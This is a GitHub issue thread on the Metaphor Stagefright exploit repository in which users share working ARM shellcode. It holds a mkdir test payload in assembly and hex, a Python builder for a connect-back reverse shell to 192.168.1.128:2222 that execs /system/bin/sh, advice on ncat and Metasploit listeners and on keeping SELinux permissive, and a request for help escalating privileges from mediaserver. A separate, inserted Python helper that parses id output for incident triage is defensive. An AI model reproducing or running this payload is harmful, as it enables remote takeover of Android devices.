NorthBit / Metaphor

Metaphor - Stagefright with ASLR bypass
GNU General Public License v3.0
312 stars 110 forks

Something about Shellcode #8

Open 3kyo0 opened 8 years ago

3kyo0 commented 8 years ago

shellcode.s

```asm
.globl _start
.align 2
_start:
    .code 32
    adr r0, filename      @ r0 = pointer to the path
    adr r1, mode          @ note: this loads the address of mode, not the value
                          @ 0x1ff; mkdir(2) takes the mode by value in r1
    mov r7, #39           @ __NR_mkdir on ARM EABI
    swi #0                @ mkdir(filename, mode)
    mov r0, #0
    mov r7, #1            @ __NR_exit
    swi #0                @ exit(0)
mode:     .short 0x1ff
filename: .asciz "/data/local/tmp/success"
```

shellcode disassemble:

```
.text:00008074 ; Segment type: Pure code
.text:00008074                 AREA .text, CODE
.text:00008074                 ; ORG 0x8074
.text:00008074                 CODE32
.text:00008074
.text:00008074                 EXPORT _start
.text:00008074 _start                                  ; "/data/local/tmp/success"
.text:00008074                 ADR     R0, filename
.text:00008078                 ADR     R1, mode
.text:0000807C                 MOV     R7, #0x27
.text:00008080                 SVC     0
.text:00008084                 MOV     R0, #0
.text:00008088                 MOV     R7, #1
.text:0000808C                 SVC     0
.text:0000808C ; ---------------------------------------------------------------------------
.text:00008090 mode            DCW 0x1FF               ; DATA XREF: .text:00008078o
.text:00008092 filename        DCB "/data/local/tmp/success",0 ; DATA XREF: .text:_starto
.text:000080AA                 DCW 0
.text:000080AA ; .text ends
```

shellcode.bin

```
16 00 8F E2 10 10 8F E2 27 70 A0 E3 00 00 00 EF
00 00 A0 E3 01 70 A0 E3 00 00 00 EF FF 01 2F 64
61 74 61 2F 6C 6F 63 61 6C 2F 74 6D 70 2F 73 75
63 63 65 73 73 00 00 00
```

Could you tell me why my shellcode doesn't work? Could you help me?

3kyo0 commented 8 years ago

The problem has been solved, thank you for sharing the code.

3kyo0 commented 8 years ago

Another problem:

```
F/libc ( 7739): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x0 in tid 7770 (Binder_2)
```

TirelessMan commented 8 years ago

Hi Coodea, I am going to replace the Metaphor shellcode with another one, but this requires me to develop a new shellcode in ARM instructions. I cannot find a shellcode on the internet either. Can you please upload/send/share your own shellcode with me? Your shellcode.bin in the first comment seems not to work, and then you resolved that problem, so can I have your shellcode please? Or how can I develop my own shellcode with ARM instructions? Any sources, any references? Thanks in advance.

3kyo0 commented 8 years ago

You can find shellcode at https://www.exploit-db.com/exploits/38124/. SELinux must be Permissive.

3kyo0 commented 8 years ago

I have got a shell:

```
id
uid=1013(media) gid=1005(audio) groups=1006(camera),1026(drmrpc),1031(mediadrm),3001(net_bt_admin),3002(net_bt),3003(inet),3007(net_bw_acct) context=u:r:mediaserver:s0
```

But another problem comes: how to escalate privileges from mediaserver?
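Added example (not part of the thread or the Metaphor code): a small triage helper that parses an `id` line like the one quoted above into the process credentials and SELinux domain, and flags anything beyond the expected mediaserver credential set, which is what a responder wants when judging what a compromised mediaserver can reach. The baseline is assumed to be the values in the quoted output, and the sample line is constructed from it.

```python
import re

# Constructed sample: the `id` output quoted in the comment above.
SAMPLE_ID = ("uid=1013(media) gid=1005(audio) groups=1006(camera),1026(drmrpc),"
             "1031(mediadrm),3001(net_bt_admin),3002(net_bt),3003(inet),"
             "3007(net_bw_acct) context=u:r:mediaserver:s0")

# Assumed baseline for a mediaserver-domain process on this device, taken from
# the same line; anything beyond it is treated as a sign of escalation.
BASELINE = {"uid": 1013, "gid": 1005, "type": "mediaserver",
            "groups": {1006, 1026, 1031, 3001, 3002, 3003, 3007}}

_CRED = re.compile(r"(\d+)\((\w+)\)")


def parse_id(line):
    """Split an `id` line into uid, gid, supplementary groups and SELinux context."""
    fields = dict(tok.split("=", 1) for tok in line.split())
    uid, uname = _CRED.match(fields["uid"]).groups()
    gid, gname = _CRED.match(fields["gid"]).groups()
    groups = {int(n): name for n, name in _CRED.findall(fields.get("groups", ""))}
    # SELinux context is user:role:type:level; pad so missing parts become "".
    user, role, typ, level = (fields.get("context", "").split(":", 3) + [""] * 4)[:4]
    return {"uid": int(uid), "user": uname, "gid": int(gid), "group": gname,
            "groups": groups, "seuser": user, "role": role, "type": typ,
            "level": level}


def deviations(parsed, baseline=BASELINE):
    """Return notes on credentials that exceed the expected mediaserver set."""
    notes = []
    if parsed["uid"] == 0:
        notes.append("uid is root")
    elif parsed["uid"] != baseline["uid"]:
        notes.append("uid %d differs from baseline %d" % (parsed["uid"], baseline["uid"]))
    if parsed["gid"] != baseline["gid"]:
        notes.append("gid %d differs from baseline %d" % (parsed["gid"], baseline["gid"]))
    extra = sorted(set(parsed["groups"]) - baseline["groups"])
    if extra:
        notes.append("unexpected supplementary groups: %s" % extra)
    if parsed["type"] != baseline["type"]:
        notes.append("SELinux type %r is not %r" % (parsed["type"], baseline["type"]))
    return notes


if __name__ == "__main__":
    creds = parse_id(SAMPLE_ID)
    print("uid=%d domain=%s groups=%s" % (creds["uid"], creds["type"],
                                           sorted(creds["groups"].values())))
    print("deviations:", deviations(creds) or "none")
```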

secmart commented 8 years ago

Hi Coodea,

how did you export only the shellcode from the Python file? As far as I understand, the shellcode is generated by the function "def build_rop", so I tried to write the variable "buf" to a file. I also tried it with "rop", but neither shellcode worked in my exploit. Can you explain in more detail how you get the shellcode? Thanks in advance.

3kyo0 commented 8 years ago

```python
import struct
import socket

cb_port = 2222
cb_host = "192.168.1.128"

buf = b''
# fork()
buf += b'\x02\x70\xa0\xe3'
buf += b'\x00\x00\x00\xef'
# continue if not parent
buf += b'\x00\x00\x50\xe3'
buf += b'\x02\x00\x00\x0a'
# exit parent
buf += b'\x00\x00\xa0\xe3'
buf += b'\x01\x70\xa0\xe3'
buf += b'\x00\x00\x00\xef'
# setsid in child
buf += b'\x42\x70\xa0\xe3'
buf += b'\x00\x00\x00\xef'
# socket/connect/dup2/dup2/dup2
buf += b'\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c'
buf += b'\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60'
buf += b'\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0'
buf += b'\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1'
buf += b'\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06'
buf += b'\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00'
buf += b'\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0'
buf += b'\xe3\x00\x00\x00\xef'
# execve(shell, argv, env)
buf += b'\x30\x00\x8f\xe2\x04\x40\x24\xe0'
buf += b'\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d'
buf += b'\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00'
buf += b'\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00'
buf += b'\xef\x02\x00'
# Add the connect back host/port
buf += struct.pack('!H', cb_port)
cb_host = socket.inet_aton(cb_host)
buf += struct.pack('=4s', cb_host)
# shell
buf += b'/system/bin/sh\x00\x00'
# argv
buf += b'sh\x00\x00'
# env
buf += b'PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00'

with open('p2222.bin', 'wb') as f:
    f.write(buf)
```

secmart commented 8 years ago

Hi Coodea,

Thanks for your answer. I built the shellcode and put it on the web server. Now the client connects to my server, but the session gets closed immediately. I tried it with ncat under Kali. There I got the message "Ncat: Connection from ...." and in the same second ncat stops. I also tried Metasploit with the payload android/meterpreter/reverse_tcp; there nothing happens. With which tool did you listen on your port to get the remote shell? How did you compile the Python file? Did you compile it under your normal OS, or did you change something so that it works on ARM processors? Thanks in advance.

3kyo0 commented 8 years ago

Keep SELinux Permissive.

TirelessMan commented 8 years ago

Hi, thanks 3kyo0 for your shellcode. Now I can run the shellcode on the target device :), but I cannot do some tasks such as creating a file or directory on the target with my shellcode! As my shellcode runs with the mediaserver process permissions, I am very limited in executing commands :(. Question: How can I find the mediaserver process permissions? How can I know which permissions the mediaserver process has? Thanks in advance.